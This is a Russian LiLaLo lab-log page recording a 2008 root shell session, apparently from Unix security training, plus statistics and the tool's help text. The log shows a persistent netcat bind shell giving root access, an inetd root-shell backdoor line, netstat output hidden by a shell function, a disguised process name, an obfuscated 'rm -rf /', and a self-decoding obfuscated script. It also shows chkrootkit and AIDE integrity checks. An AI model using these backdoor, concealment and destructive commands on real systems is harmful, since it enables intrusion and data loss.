[ править ]

Журнал лабораторных работ

Содержание

Журнал

Среда (09/03/08)

Файлы
Статистика
Справка
О программе

Журнал

Среда (09/03/08)

/dev/pts/0

18:21:17

#which netstat

/bin/netstat

18:21:37

#netstat()

> {
> netstat "$@" | grep -v :79
> }

18:22:03

#netstat -np -Ainet -l | grep -v 127.0.0.1 | less

18:22:31

#kill %1

[1]   Terminated              netstat -np -Ainet -l | grep -v 127.0.0.1 | less

18:22:35

#netstat() { /usr/bin/netstat "$@" | grep -v :79; }

18:22:44

#netstat() { /bin/netstat "$@" | grep -v :79; }

18:22:51

#netstat -np -Ainet -l | grep -v 127.0.0.1 | less

18:23:21

#chkrootkit

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
...
chkdirs: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... lo: not promisc and no packet sniffer sockets
eth0: not promisc and no packet sniffer sockets
eth1: PACKET SNIFFER(/sbin/dhclient3[14115])
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted

18:23:46

#chkrootkit | grep INFECTED

Checking `inetdconf'... INFECTED

18:24:01

#chkrootkit -v | grep INFECTED

Usage: /usr/sbin/chkrootkit [options] [test ...]
Options:
        -h                show this help and exit
        -V                show version information and exit
        -l                show available tests and exit
        -d                debug
        -q                quiet mode
        -x                expert mode
        -e                exclude known false positive files/dirs, quoted,
                          space separated, READ WARNING IN README
        -r dir            use dir as the root directory
        -p dir1:dir2:dirN path for the external commands used by chkrootkit
        -n                skip NFS mounted dirs

18:24:14

#chkrootkit -x | grep INFECTED

INFECTED
^C

18:24:33

#chkrootkit -x | less

18:25:22

#bg

[1]+ nc -e /bin/sh -l -p 3000 &

18:25:23

#ssh user@192.168.15.3

l3-agent is already running: pid=93499; pidfile=/home/user/.lilalo/l3-agent.pid
[user@fbsd3 ~]$
[user@fbsd3 ~]$
[user@fbsd3 ~]$ telnet 192.168.15.111 3000
Trying 192.168.15.111...
Connected to esx111.unix.nt.
Escape character is '^]'.
id #
uid=0(root) gid=0(root) groups=0(root)
touch /tmp/ggg #
...
^C^]
telnet> q
Connection closed.
[user@fbsd3 ~]$ telnet 192.168.15.111 3001
Trying 192.168.15.111...
telnet: connect to address 192.168.15.111: Connection refused
telnet: Unable to connect to remote host
[user@fbsd3 ~]$ exit
logout
Connection to 192.168.15.3 closed.

18:26:32

#man nc

18:26:52

#nohup sh -c 'while true; do nc -e /bin/sh -l -p 3000 ; done' &

[2] 25597
nohup: ignoring input and appending output to `nohup.out'

18:27:06

#ssh user@192.168.15.3

l3-agent is already running: pid=93499; pidfile=/home/user/.lilalo/l3-agent.pid
[user@fbsd3 ~]$ telnet 192.168.15.111 3000
Trying 192.168.15.111...
Connected to esx111.unix.nt.
Escape character is '^]'.
id #
uid=0(root) gid=0(root) groups=0(root)
exit
^]
telnet> q
...
64 bytes from ya.ru (213.180.204.8): icmp_seq=3 ttl=55 time=77.7 ms
--- ya.ru ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 34.633/49.732/77.733/19.821 ms
^]
telnet> q
Connection closed.
[user@fbsd3 ~]$ exit
logout
Connection to 192.168.15.3 closed.

18:29:39

#vi /etc/inetd.conf

--- /tmp/l3-saved-18306.3803.3128	2008-09-03 15:29:43.000000000 +0000
+++ /etc/inetd.conf	2008-09-03 15:29:48.000000000 +0000
@@ -19,7 +19,7 @@
 #daytime		stream	tcp	nowait	root	internal
 #time		stream	tcp	nowait	root	internal
 
-finger		stream	tcp	nowait	root	/bin/sh sh -i
+#finger		stream	tcp	nowait	root	/bin/sh sh -i
 
 #:STANDARD: These are standard services.

18:29:48

#chkrootkit

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
...
chkdirs: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... lo: not promisc and no packet sniffer sockets
eth0: not promisc and no packet sniffer sockets
eth1: PACKET SNIFFER(/sbin/dhclient3[14115])
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted

18:29:53

#chkrootkit | grep not

Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
...
Checking `lkm'... chkproc: nothing detected
chkdirs: nothing detected
Checking `rexedcs'... not found
Checking `sniffer'... lo: not promisc and no packet sniffer sockets
eth0: not promisc and no packet sniffer sockets
Checking `w55808'... not infected
Checking `wted'... chkwtmp: nothing deleted
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... chklastlog: nothing deleted

18:30:03

#chkrootkit | grep INF

18:30:08

#netstat -np

unix  3      [ ]         STREAM     CONNECTED     48890    23460/gnome-power-m
unix  3      [ ]         STREAM     CONNECTED     48882    23381/nm-applet     /tmp/orbit-user/linc-5b55-0-4f818d5b5ce50
unix  3      [ ]         STREAM     CONNECTED     48881    20592/gconfd-2
unix  3      [ ]         STREAM     CONNECTED     48874    10980/X             /tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     48873    23460/gnome-power-m
unix  3      [ ]         STREAM     CONNECTED     48878    20592/gconfd-2      /tmp/orbit-user/linc-5070-0-660fb4a047575
unix  3      [ ]         STREAM     CONNECTED     48741    23381/nm-applet
unix  3      [ ]         STREAM     CONNECTED     48737    10980/X             /tmp/.X11-unix/X0
unix  3      [ ]         STREAM     CONNECTED     48736    23381/nm-applet
unix  3      [ ]         STREAM     CONNECTED     48732    2363/dbus-daemon    /var/run/dbus/system_bus_socket
...
unix  3      [ ]         STREAM     CONNECTED     18410    8879/dhcdbd
unix  2      [ ]         STREAM     CONNECTED     18408    8879/dhcdbd
unix  2      [ ]         STREAM     CONNECTED     11537    4974/logger
unix  3      [ ]         STREAM     CONNECTED     6442     2363/dbus-daemon    /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     6441     2739/avahi-daemon:
unix  3      [ ]         STREAM     CONNECTED     6359     2742/avahi-daemon:
unix  3      [ ]         STREAM     CONNECTED     6358     2739/avahi-daemon:
unix  2      [ ]         STREAM     CONNECTED     6355     2739/avahi-daemon:
unix  3      [ ]         STREAM     CONNECTED     5599     2363/dbus-daemon
unix  3      [ ]         STREAM     CONNECTED     5598     2363/dbus-daemon

18:30:15

#netstat -npl

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:807           0.0.0.0:*               LISTEN      8687/famd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      4949/mysqld
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      1929/portmap
tcp        0      0 0.0.0.0:30001           0.0.0.0:*               LISTEN      25565/nc
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      3219/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      6515/cupsd
tcp        0      0 0.0.0.0:3000            0.0.0.0:*               LISTEN      25629/nc
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      8363/exim4
...
unix  2      [ ACC ]     STREAM     LISTENING     100508   16383/gnome-termina /tmp/orbit-user/linc-3fff-0-507f1b894ab4
unix  2      [ ACC ]     STREAM     LISTENING     20824    9920/hcid           @/org/bluez/audio
unix  2      [ ACC ]     STREAM     LISTENING     11548    4949/mysqld         /var/run/mysqld/mysqld.sock
unix  2      [ ACC ]     STREAM     LISTENING     23727    10980/X             @/tmp/.X11-unix/X0
unix  2      [ ACC ]     STREAM     LISTENING     20792    9920/hcid           /var/run/sdp
unix  2      [ ACC ]     STREAM     LISTENING     22762    10926/gdm           /var/run/gdm_socket
unix  2      [ ACC ]     STREAM     LISTENING     14538    6515/cupsd          /var/run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     18678    8997/hald           @/var/run/hald/dbus-LXu2EgfhWd
unix  2      [ ACC ]     STREAM     LISTENING     6439     2739/avahi-daemon:  /var/run/avahi-daemon/socket
unix  2      [ ACC ]     STREAM     LISTENING     44148    21472/dbus-daemon   @/tmp/dbus-wqAKif1OkQ

18:30:18

#netstat -npl -A inet

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:807           0.0.0.0:*               LISTEN      8687/famd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      4949/mysqld
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      1929/portmap
tcp        0      0 0.0.0.0:30001           0.0.0.0:*               LISTEN      25565/nc
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      3219/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      6515/cupsd
tcp        0      0 0.0.0.0:3000            0.0.0.0:*               LISTEN      25629/nc
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      8363/exim4
udp        0      0 0.0.0.0:514             0.0.0.0:*                           12094/syslog-ng
udp        0      0 0.0.0.0:514             0.0.0.0:*                           12094/syslog-ng
udp        0      0 0.0.0.0:68              0.0.0.0:*                           14115/dhclient
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           2739/avahi-daemon:
udp        0      0 0.0.0.0:111             0.0.0.0:*                           1929/portmap
udp        0      0 0.0.0.0:631             0.0.0.0:*                           6515/cupsd
udp        0      0 0.0.0.0:50554           0.0.0.0:*                           2739/avahi-daemon:

18:30:20

#vi /tmp/myname.pl

--- /dev/null	2008-09-03 11:45:12.211695600 +0000
+++ /tmp/myname.pl	2008-09-03 15:31:05.000000000 +0000
@@ -0,0 +1,7 @@
+#!/usr/bin/perl
+
+$0='htttttp';
+while (<>)
+{
+}
+

18:31:05

#chmod +x /tmp/myname.pl

18:31:07

#/tmp/myname.pl &

[3] 29433
[3]+  Stopped                 /tmp/myname.pl

18:31:13

#ps

  PID TTY          TIME CMD
18306 pts/4    00:00:00 l3script
25546 pts/4    00:00:00 sh
25565 pts/4    00:00:00 nc
25597 pts/4    00:00:00 sh
25629 pts/4    00:00:00 nc
29433 pts/4    00:00:00 myname.pl
29448 pts/4    00:00:00 ps

18:31:14

#netstat -lnp | less

18:32:35

#echo sn+-sg+: | tr b-za+: a-z\ /

rm -rf /

18:33:23

#tr abc 123

ababababab
1212121212

18:33:51

#tr abc bcd

aaabbbbccc
bbbccccddd

18:34:03

#$(echo sn+-sg+: | tr b-za+: a-z\ /

18:34:51

18:34:54

#vi script

--- /dev/null	2008-09-03 11:45:12.211695600 +0000
+++ script	2008-09-03 15:35:34.000000000 +0000
@@ -0,0 +1 @@
+echo hello

18:35:34

#cat script

echo hello

18:35:37

#cat script | tr a-z b-za

fdip ifmmp

18:35:42

#cat script | tr a-z b-za > megascript

18:35:57

#vi megascript

--- /tmp/l3-saved-18306.5179.19881	2008-09-03 15:35:59.000000000 +0000
+++ megascript	2008-09-03 15:36:52.000000000 +0000
@@ -1 +1,3 @@
+#!/bin/sh
+cat $0 | tr b-za a-z | grep -v 11111111 | grep -v^#  | sh -s
 fdip ifmmp

18:36:52

#chmod +x megascript

18:36:57

#./megascript

grep: invalid option -- ^
Usage: grep [OPTION]... PATTERN [FILE]...
Try `grep --help' for more information.
./megascript: line 3: fdip: command not found

18:37:00

#vi megascript

--- /tmp/l3-saved-18306.19375.31282	2008-09-03 15:37:02.000000000 +0000
+++ megascript	2008-09-03 15:37:07.000000000 +0000
@@ -1,3 +1,3 @@
 #!/bin/sh
-cat $0 | tr b-za a-z | grep -v 11111111 | grep -v^#  | sh -s
+cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^#  | sh -s
 fdip ifmmp

18:37:07

#./megascript

hello
./megascript: line 3: fdip: command not found

18:37:08

#vi megascript

--- /tmp/l3-saved-18306.27113.7700	2008-09-03 15:37:13.000000000 +0000
+++ megascript	2008-09-03 15:37:21.000000000 +0000
@@ -1,3 +1,4 @@
 #!/bin/sh
 cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^#  | sh -s
+exit #11111111111111
 fdip ifmmp

18:37:21

#./megascript

hello

18:37:22

#cat ./megascript

#!/bin/sh
cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^#  | sh -s
exit #11111111111111
fdip ifmmp

18:37:29

#aide

aide          aide.wrapper  aideinit

18:37:29

#aide

aide          aide.wrapper  aideinit

18:37:29

#aideinit

Running aide --init...
^Z
[4]+  Stopped                 aideinit

18:42:37

#bg

[4]+ aideinit &

18:42:37

#vi /etc/aide/aide.conf

18:44:39

aide.conf    aide.conf.d/

18:44:39

#vi /etc/aide/aide.conf.d/

18:44:39

#vi /etc/aide/aide.conf.d/31_aide_squid

18:45:18

Size = s+b
# Files that stay static
InodeData = OwnerMode+n+i+Size
StaticFile = m+c+Checksums
# Directories that change their contents during system operation
VarDir = OwnerMode+n+i
# Logs are special: they are continously written to, may be compressed
# have their file name changed in different, mutually incompatibly ways
# and apprear and vanish at will. Handling this is a a complex and error-
# Directories that change their contents during system operation
VarDir = OwnerMode+n+i
# While a live log is being written to, it doesn't change its 36,0-1         9%

18:45:50

#vi /etc/aide/aide.conf.d/70_aide_tmp

18:46:12

70_aide_dev       70_aide_proc_sys  70_aide_var
70_aide_etc       70_aide_tmp

18:46:12

#vi /etc/aide/aide.conf.d/

18:46:12

#man aidde

18:46:49

#man aide

18:47:05

#ps aux | grep aide

root     29680  0.0  0.0   2572  1104 pts/4    S    15:41   0:00 /bin/sh /usr/sbin/aideinit
root     29912  0.0  0.0   2556  1064 pts/4    S    15:41   0:00 /bin/sh /usr/bin/aide.wrapper --init
root     30141 57.7  0.4  17272 16700 pts/4    R    15:41   3:10 /usr/bin/aide --config /var/lib/aide/aide.conf.autogenerated --init
root     30280  0.0  0.0   1832   520 pts/4    R+   15:47   0:00 grep aide

18:47:08

#which yppaswd

18:47:36

#which yppasswd

18:47:40

#which ping6

/bin/ping6

18:47:46

#echo XXXXXX >> /bin/ping6

18:48:00

#ping6

Usage: ping6 [-LUdfnqrvVaA] [-c count] [-i interval] [-w deadline]
             [-p pattern] [-s packetsize] [-t ttl] [-I interface]
             [-M mtu discovery hint] [-S sndbuf]
             [-F flow label] [-Q traffic class] [hop1 ...] destination

18:48:02

#vi /etc/aide/aide.conf

18:49:06

#Files that stay static but are copied to a ram disk on startup

aide.conf.autogenerated  aide.db.new

18:49:09

#man aide

18:51:31

#exit

AIDE, version 0.13.1
### AIDE database at /var/lib/aide/aide.db.new initialized.
l3script: exi: command not found
[4]-  Done                    aideinit

18:52:06

#ssh 192.168.15.3

Password:

18:52:14

#ssh user@192.168.15.3

Path:   /usr/ports/security/yafic
Info:   Yet Another File Integrity Checker, similar to Tripwire
Maint:  allan@saddi.com
B-deps: gettext-0.16.1_3 gmake-3.81_2 libiconv-1.11_1
R-deps:
WWW:    http://philosophysw.com/software/yafic/
/usr/ports>exit
exit
[user@fbsd3 /usr/src/bin/ls]$ exit
logout
Connection to 192.168.15.3 closed.

18:59:46

#ls /etc/aide/aide.conf.d/

10_aide_hostname          31_aide_ippl
10_aide_year              31_aide_lastlog
30_aide_apache2           31_aide_libapache2-mod-fastcgi
30_inn2_vars              31_aide_logrotate
31_aide_acpid             31_aide_lvm2
31_aide_adjtime           31_aide_mailman
31_aide_aide              31_aide_man
31_aide_amanda-client     31_aide_mlocate
31_aide_amanda-server     31_aide_modules
31_aide_amavisd-new       31_aide_mtab
...
31_aide_dovecot           31_aide_wtmp
31_aide_dpkg              31_aide_xfree86-common
31_aide_exim4             31_aide_xinetd
31_aide_exim4_logs        70_aide_dev
31_aide_findutils         70_aide_etc
31_aide_gpg               70_aide_proc_sys
31_aide_ifupdown          70_aide_tmp
31_aide_inetd             70_aide_var
31_aide_initscripts       99_aide_root
31_aide_inn2

18:59:53

#vi /etc/aide/aide.conf.d/70_aide_etc

19:00:17

70_aide_dev       70_aide_proc_sys  70_aide_var
70_aide_etc       70_aide_tmp

19:00:17

#dpkg -S /etc/aide/aide.conf.d/

10_aide_hostname                31_aide_ippl
10_aide_year                    31_aide_lastlog
30_aide_apache2                 31_aide_libapache2-mod-fastcgi
30_inn2_vars                    31_aide_logrotate
31_aide_acpid                   31_aide_lvm2
31_aide_adjtime                 31_aide_mailman
31_aide_aide                    31_aide_man
31_aide_amanda-client           31_aide_mlocate
31_aide_amanda-server           31_aide_modules
31_aide_amavisd-new             31_aide_mtab
...
31_aide_apt-listbugs            31_aide_openvpn
31_aide_apt-listchanges         31_aide_php4
31_aide_apt_frqchg              31_aide_php5
31_aide_apt_stable              31_aide_privoxy
31_aide_apt_unstable            31_aide_proftpd
31_aide_aptitude                31_aide_resolvconf
31_aide_aptitude_frqchg         31_aide_rngd
31_aide_bind9                   31_aide_screen
31_aide_checksecurity           31_aide_slrn
31_aide_clamav                  31_aide_smokeping

19:00:17

#dpkg -S /etc/aide/aide.conf.d/31_aide_php5

dpkg: /etc/aide/aide.conf.d/31_aide_php5 not found.

19:00:50

#ls /etc/logrotate.d/

apache2   cups        exim4-paniclog  scrollkeeper         wpa_action
apt       dpkg        mysql-server    syslog-ng            wpa_supplicant
aptitude  exim4-base  rsyslog         unattended-upgrades

19:01:08

#dpkg -S /etc/logrotate.d/apache2

apache2.2-common: /etc/logrotate.d/apache2

19:01:17

#dpkg -S /etc/aide/aide.conf.d/31_aide_openvpn

dpkg: /etc/aide/aide.conf.d/31_aide_openvpn not found.

19:01:31

#head /etc/aide/aide.conf

# AIDE conf
# The daily cron job depends on these paths
database=file:/var/lib/aide/aide.db
database_out=file:/var/lib/aide/aide.db.new
database_new=file:/var/lib/aide/aide.db.new
gzip_dbout=yes
# if you want to sacrifice security for speed, remove some of these
# checksums. Whirlpool needs to be disabled on sparc and sparc64

19:01:50

#less /etc/crontab

19:02:44

#less /etc/cron.daily/

19:02:49

#ls /etc/cron.daily/

aide     apt       bsdmainutils  exim4-base  man-db
apache2  aptitude  chkrootkit    logrotate   standard

19:02:51

#apt-cache search sshfs

sshfs - filesystem client based on SSH File Transfer Protocol

19:05:17

#apt-cache search gmailfs

gmailfs - Use your GMail account as a filesystem

19:08:07

#apt-get install gmailfs

Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
  encfs fuse-utils libboost-serialization1.34.1 libfuse2 librlog1c2a
  python-clientform python-fuse python-libgmail python-mechanize
The following NEW packages will be installed:
  encfs fuse-utils gmailfs libboost-serialization1.34.1 libfuse2 librlog1c2a
  python-clientform python-fuse python-libgmail python-mechanize
0 upgraded, 10 newly installed, 0 to remove and 0 not upgraded.
...
creating fuse group...
Adding group `fuse' (GID 118) ...
Done.
udev active, skipping device node creation.
Setting up encfs (1.4.2-2) ...
Setting up python-fuse (1:0.2-pre3-8) ...
Setting up python-clientform (0.2.9-1) ...
Setting up python-mechanize (0.1.7b-3) ...
Setting up python-libgmail (0.1.10-3) ...
Setting up gmailfs (0.8-5) ...

19:08:23

#dpkg -L gmailfs

/.
/sbin
/usr
/usr/bin
/usr/bin/mount.gmailfs
/usr/share
/usr/share/pyshared
/usr/share/pyshared/gmailfs.py
/usr/share/pyshared-data
/usr/share/pyshared-data/gmailfs
...
/usr/share/doc/gmailfs/examples/tests.py.gz
/usr/share/doc/gmailfs/NEWS.Debian.gz
/usr/share/doc/gmailfs/changelog.Debian.gz
/usr/share/man
/usr/share/man/man8
/usr/share/man/man8/mount.gmailfs.8.gz
/etc
/etc/gmailfs
/etc/gmailfs/gmailfs.conf
/sbin/mount.gmailfs

19:08:30

#less /usr/share/doc/gmailfs/README

прошло 12 минут

19:21:28

#grep mount /usr/share/doc/gmailfs/README

the ability to enter your password when mounting instead of having to
You can mount your Gmail filesystem either via fstab or on the command
line using mount. In either case, the fuse module needs to be loaded
prior to attempting to mount the Gmail filesystem. This module can be
* To mount from the command line, do:
  mount.gmailfs none /mnt -o username=gmailuser@gmail.com,password=gmailpass,fsname=zOlRRa
  mount.gmailfs none /mnt -o username=gmailuser@gmail.com,fsname=zOlRRa -p
5MB. Files smaller than the minimum blocksize will only use the amount
any files created during a previous mount with a different blocksize

19:22:33

#nt mount.gmailfs none /mnt -o username=ttt191919@gmail.com,pas

19:22:52

#ls /mmount: according to mtab, python is already mounted on /mnt

Traceback (most recent call last):
  File "/usr/bin/mount.gmailfs", line 166, in <module>
    main(mountpoint, namedOptions, useEncfs)
  File "/usr/bin/mount.gmailfs", line 92, in main
    gmailfs.main(mountpoint, namedOptions)
  File "/usr/lib/python2.5/site-packages/gmailfs.py", line 1180, in main
    server.main()
  File "/usr/lib/python2.5/site-packages/fuse.py", line 713, in main
    main(**d)
fuse.FuseError: filesystem initialization failed
nt/

19:23:01

#umount /mnt

19:23:37

#ls /mnt

19:23:40

#umount /mnt

19:23:40

#less /usr/share/doc/gmailfs/README

19:24:20

#dd if=/dev/zero of=/mnt/30MB bs=1024k count=30

30+0 records in
30+0 records out
31457280 bytes (31 MB) copied, 79.3208 s, 397 kB/s

19:26:05

#ls /mnt/

19:26:18

#ls -l /mnt/

total 0

19:26:22

#dd if=/dev/zero of=/mnt/f bs=1024k count=1

1+0 records in
1+0 records out
1048576 bytes (1.0 MB) copied, 0.579679 s, 1.8 MB/s

19:26:36

#ls /mnt/

Файлы

./megascript

script

./megascript

#!/bin/sh
cat $0 | tr b-za a-z | grep -v 11111111 | grep -v ^#  | sh -s
exit #11111111111111
fdip ifmmp

script

echo hello

Статистика

Время первой команды журнала 18:21:17 2008- 9- 3

Время последней команды журнала 19:26:36 2008- 9- 3

Количество командных строк в журнале 101

Процент команд с ненулевым кодом завершения, % 16.83

Процент синтаксически неверно набранных команд, % 2.97

Суммарное время работы с терминалом ^*, час 1.09

Количество командных строк в единицу времени, команда/мин 1.55

Частота использования команд

`vi`	13	\|==========\| 10.32%
`grep`	11	\|========\| 8.73%
`chkrootkit`	8	\|======\| 6.35%
`ls`	8	\|======\| 6.35%
`less`	8	\|======\| 6.35%
`netstat`	6	\|====\| 4.76%
`tr`	6	\|====\| 4.76%
`dpkg`	5	\|===\| 3.97%
`man`	4	\|===\| 3.17%
`cat`	4	\|===\| 3.17%
`~`	4	\|===\| 3.17%
`megascript`	4	\|===\| 3.17%
`ssh`	4	\|===\| 3.17%
`which`	4	\|===\| 3.17%
`netstat()`	3	\|==\| 2.38%
`}`	2	\|=\| 1.59%
`umount`	2	\|=\| 1.59%
`chmod`	2	\|=\| 1.59%
`aide`	2	\|=\| 1.59%
`bg`	2	\|=\| 1.59%
`echo`	2	\|=\| 1.59%
`ping6`	2	\|=\| 1.59%
`ps`	2	\|=\| 1.59%
`dd`	2	\|=\| 1.59%
`apt-cache`	2	\|=\| 1.59%
`)`	1	\|\| 0.79%
`myname.pl`	1	\|\| 0.79%
`aideinit`	1	\|\| 0.79%
`apt-get`	1	\|\| 0.79%
`do`	1	\|\| 0.79%
`nt`	1	\|\| 0.79%
`Files`	1	\|\| 0.79%
`$(echo`	1	\|\| 0.79%
`nohup`	1	\|\| 0.79%
`>`	1	\|\| 0.79%
`head`	1	\|\| 0.79%
`kill`	1	\|\| 0.79%
`exit`	1	\|\| 0.79%
`done'`	1	\|\| 0.79%

____
*) Интервалы неактивности длительностью 30 минут и более не учитываются

Справка

Для того чтобы использовать LiLaLo, не нужно знать ничего особенного: всё происходит само собой. Однако, чтобы ведение и последующее использование журналов было как можно более эффективным, желательно иметь в виду следующее:

В журнал автоматически попадают все команды, данные в любом терминале системы.
Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l

bash: l: command not found
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4
Обратите внимание на то, что код завершения команды может быть отличен от нуля не только в тех случаях, когда команда была выполнена с ошибкой. Многие команды используют код завершения, например, для того чтобы показать результаты проверки

Команды, ход выполнения которых был прерван пользователем, выделяются цветом.

$ find / -name abc

find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C

Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id

uid=0(root) gid=0(root) Gruppen=0(root)
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc

2a3,5 > if [ -f /usr/local/etc/bash_completion ]; then > . /usr/local/etc/bash_completion > fi
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
$ patch ~/.bashrc
В данном случае изменения применяются к файлу ~/.bashrc
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.

Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
```
$ whoami
```
```
user
```
```
$ #^ Интересно, кто я?
```
в журнале это будет выглядеть так:
```
$ whoami
```
```
user
```
Интересно, кто я?

Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:

$ whoami

user

$ cat > /dev/null #^ Интересно, кто я?

Программа whoami выводит имя пользователя, под которым 
мы зарегистрировались в системе.
-
Она не может ответить на вопрос о нашем назначении 
в этом мире.

В журнале это будет выглядеть так:

$ whoami

user

Интересно, кто я?

Программа whoami выводит имя пользователя, под которым
мы зарегистрировались в системе.

Она не может ответить на вопрос о нашем назначении
в этом мире.

Для разделения нескольких абзацев между собой используйте символ "-", один в строке.

Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=

Содержимое файла может быть показано в журнале. Для этого его нужно вывести с помощью программы cat. Если вывод команды отметить симоволами #!, содержимое файла будет показано в журнале в специально отведённой для этого секции.

Для того чтобы вставить скриншот интересующего вас окна в журнал, нужно воспользоваться командой l3shot. После того как команда вызвана, нужно с помощью мыши выбрать окно, которое должно быть в журнале.

Команды в журнале расположены в хронологическом порядке. Если две команды давались одна за другой, но на разных терминалах, в журнале они будут рядом, даже если они не имеют друг к другу никакого отношения.
```
1
    2
3   
    4
```
Группы команд, выполненных на разных терминалах, разделяются специальной линией. Под этой линией в правом углу показано имя терминала, на котором выполнялись команды. Для того чтобы посмотреть команды только одного сенса, нужно щёкнуть по этому названию.

О программе

LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008

$Id$